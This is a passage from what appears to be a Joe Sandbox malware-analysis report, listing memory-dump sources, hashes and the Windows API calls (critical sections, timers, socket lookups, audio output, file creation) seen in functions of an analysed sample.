                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                          • Opcode ID: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                          • Instruction ID: 85195bc957575009e4a7604c5a43e45099f91f30af12cfc7e5b33174ac27f883
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF81C0316047494FC724DF39989057BB7F1AF853117148A2FE6A787B81DB38E805CB68
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401181
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004011B1
                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004011C5
                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004011D5
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004011E3
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040122A
                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0040123E
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401261
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040129E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveTimetime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3486229058-0
                                                                                                                                                                                                          • Opcode ID: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                          • Instruction ID: b4a63a4f06c8fcffd2d454e61e85ed039b73bf68413dd997414ba6e559c29426
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6641D6357003148FCB309F60E80466BB7F4AF6575470486AEE896BB3E1DB38EC459AA5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000020,00000000), ref: 00411B68
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExchangeInterlocked
                                                                                                                                                                                                          • String ID: GET$_bytesLoaded$_bytesTotal$_customHeaders$contentType$loaded
                                                                                                                                                                                                          • API String ID: 367298776-2876428247
                                                                                                                                                                                                          • Opcode ID: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                          • Instruction ID: 337a073203a489cf9af6a636d5e82807fd5ac3b12a53b57697a6972a4ae57270
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6D126706047056BC714EF65D842AABB7E5BF88304F404A2EFA4687392EB38F945C799
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004F5BA3,00000000), ref: 004F34EA
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3537
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3545
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3556
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F355F
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3594
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F359D
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36AD
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36BB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2801635615-0
                                                                                                                                                                                                          • Opcode ID: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                          • Instruction ID: 93c01fc31a9ee7373f9c1d93048bf40271cec5808ab28bfcb2eca2428eaae834
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F51BE3020474A9BD7249F319558BBBBBF8AF84742F04485EE5DEC3361DB28EA08C724
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004F3709
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F374C
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F375C
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F376D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F377A
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F37A9
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F37C5
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F37D5
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F37EC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                          • Opcode ID: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                          • Instruction ID: 1822ab8b2bc00c4b335a7296647f06df4fe24da2c1cedc303b1505dbbb5a7089
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2831D1B11087894BC610AF35A9807EBFBF8BF89714F04499DE5E953251C734AA1DC726
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: gethostbynamehtonlhtonsinet_addr
                                                                                                                                                                                                          • String ID: localhost
                                                                                                                                                                                                          • API String ID: 4009071410-2663516195
                                                                                                                                                                                                          • Opcode ID: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                          • Instruction ID: cf482c115b2fa46a5b5609c5aae3d134ea41c2cdeafd480f3feffcf81808ee73
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9131ED30208311ABDB20DF249C85BBBB7E5FF95710F004A1EF9559B381E7719948C7A6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • timeGetTime.WINMM(00000000), ref: 004145E1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Timetime
                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                                                          • API String ID: 17336451-2178600047
                                                                                                                                                                                                          • Opcode ID: a6eb4a1a4bf024f16c397edd5e841aed2049ab2de515439dd25e44f6491a1c28
                                                                                                                                                                                                          • Instruction ID: e32ce3efbecf0e845fb5c017bd6949167df468d5a0ad1b28c98723774e94ba96
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6eb4a1a4bf024f16c397edd5e841aed2049ab2de515439dd25e44f6491a1c28
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79C17E313046059BD718DF15C494BEA77A6BFC8704F18856EE8498F382CB79ED42CB9A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • timeKillEvent.WINMM(?), ref: 004D8B13
                                                                                                                                                                                                          • Sleep.KERNEL32(00000001,?,0041D4A9), ref: 004D8B2D
                                                                                                                                                                                                          • waveOutReset.WINMM(?,?,0041D4A9), ref: 004D8B34
                                                                                                                                                                                                          • waveOutUnprepareHeader.WINMM(?,-000013C4,00000020,?,?,0041D4A9), ref: 004D8B5A
                                                                                                                                                                                                          • Sleep.KERNEL32(00000001,?,?,0041D4A9), ref: 004D8B63
                                                                                                                                                                                                          • waveOutClose.WINMM(?,?,0041D4A9), ref: 004D8B86
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wave$Sleep$CloseEventHeaderKillResetUnpreparetime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3030913982-0
                                                                                                                                                                                                          • Opcode ID: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                          • Instruction ID: 723e303dfaa0e6e3e16fcc3d7d301ea8209cd941138754b25ec6b12d62c8e06b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0401ADB5A00214ABC3149F14EC88AAEB7F8FB98B11F00091BF41497301CB79A9598BF5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000,?,?,?,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF94E
                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,-00000001,00000000,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF99D
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000), ref: 004CF9BF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
